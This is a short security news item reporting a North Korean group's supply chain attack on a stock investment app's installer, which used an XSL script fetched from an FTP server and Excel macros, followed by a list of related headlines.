Security News > 2021 > January > North Korean software supply chain attack targets stock investors
North Korean hacking group Thallium has targeted users of a private stock investment messenger service in a software supply chain attack, according to a report published this week.
Attackers alter the installer of a stock investment app.
Within the legitimate installer of the stock investment platform, attackers injected specific commands that fetched a malicious XSL script from a rogue FTP server, and executed it on Windows systems via the in-built wmic.
Excel macros also used to deliver the payload. ESTsecurity researchers also observed Microsoft Office documents, such as Excel spreadsheets which contained macros were distributing the aforementioned XSL script payload. "ESRC is paying attention to the fact that the Thallium organization is using the 'XSL Script Processing' technique not only in spear phishing attacks based on malicious documents, but also for niche attacks including supply chain attacks," stated ESTsecurity researchers in their translated report.
Whether the goal behind this attack was monetary gain or espionage on traders, supply chain attacks have become a common nuisance of these times.
Last month, attackers targeted the open-source ecosystem RubyGems in a software supply chain attack to steal cryptocurrency from infected machines.
News URL
Related news
- North Korean Hackers Using New VeilShell Backdoor in Stealthy Cyber Attacks (source)
- Supply Chain Attacks Can Exploit Entry Points in Python, npm, and Open-Source Ecosystems (source)
- North Korean Group Collaborates with Play Ransomware in Significant Cyber Attack (source)
- North Korean govt hackers linked to Play ransomware attack (source)
- LottieFiles hit in npm supply chain attack targeting users' crypto (source)
- LottieFiles hacked in supply chain attack to steal users’ crypto (source)
- LottieFiles supply chain attack exposes users to malicious crypto wallet drainer (source)